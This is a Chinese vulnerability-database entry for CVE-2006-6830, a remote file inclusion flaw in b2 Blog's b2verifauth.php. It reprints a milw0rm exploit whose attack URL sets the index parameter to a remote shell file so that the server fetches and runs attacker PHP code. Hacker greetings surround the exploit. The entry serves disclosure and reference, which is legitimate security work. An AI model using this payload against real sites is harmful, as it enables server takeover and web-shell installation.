Cafelog B2 Blog 'B2Verifauth.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111845 漏洞类型 输入验证
发布时间 2006-12-23 更新时间 2007-01-02
CVE编号 CVE-2006-6830 CNNVD-ID CNNVD-200612-638
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2983
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-638
|漏洞详情
b2Blog0.5及早期版本的b2verifauth.php脚本存在PHP远程文件包含漏洞,远程攻击者可以借助index参数中的URL执行任意PHP代码。
|漏洞EXP
******************************************************************************************************
*b2 - 0.5 * [index] ******************* Remote File Ýnclude*******************************************
******************************************************************************************************
******************************************* +class : Remote File Include Vulnerability*
+******************************************************************************************************************
+Author : mdx                                                               
*
*****************************************************************************
+Files :                                                                    *
+b2verifauth.php? 							    *
*                                                                           *
**********************************************************************************
+code  :								         *
+									         *
+         include($index);							 *
+									         *
*********************************************************************************************
+ Exploit  :										    *
+********************************************************************************************+
+ http://www.site.***/[path]/b2verifauth.php?index=http://mdxshell.txt?  		     +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
=================================================================================================================
?		   Hi , The_bat_hacker , How are you ? ;=) 				     			*
?											     			*
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , Ozii ,padisah, sakkure ,zip,y.$il abbad, dreamlord  *
?											     			*
?////////////////////////////////////////////////////////////////////////////////////////////////////////////////
?---------------------specials thanks  stroke ,SHiKaA----------------------------------------*
**********************************************************************************************
*******************									     *
*******************                   KORKULARINIZ SADECE KABUSLARINIZDIR..  		     *
*******************									     *
*******************                        Turkish Hacker by mdx  			     *
******************* 		   							     *
*******************                        Korkmak Kurtulmak Degildir.			     *
*******************              							     *
**********************************************************************************************

# milw0rm.com [2006-12-23]
|参考资料

来源:XF
名称:b2blog-b2verifauth-file-include(31139)
链接:http://xforce.iss.net/xforce/xfdb/31139
来源:BID
名称:21749
链接:http://www.securityfocus.com/bid/21749
来源:MILW0RM
名称:2983
链接:http://www.milw0rm.com/exploits/2983
来源:MILW0RM
名称:2983
链接:http://milw0rm.com/exploits/2983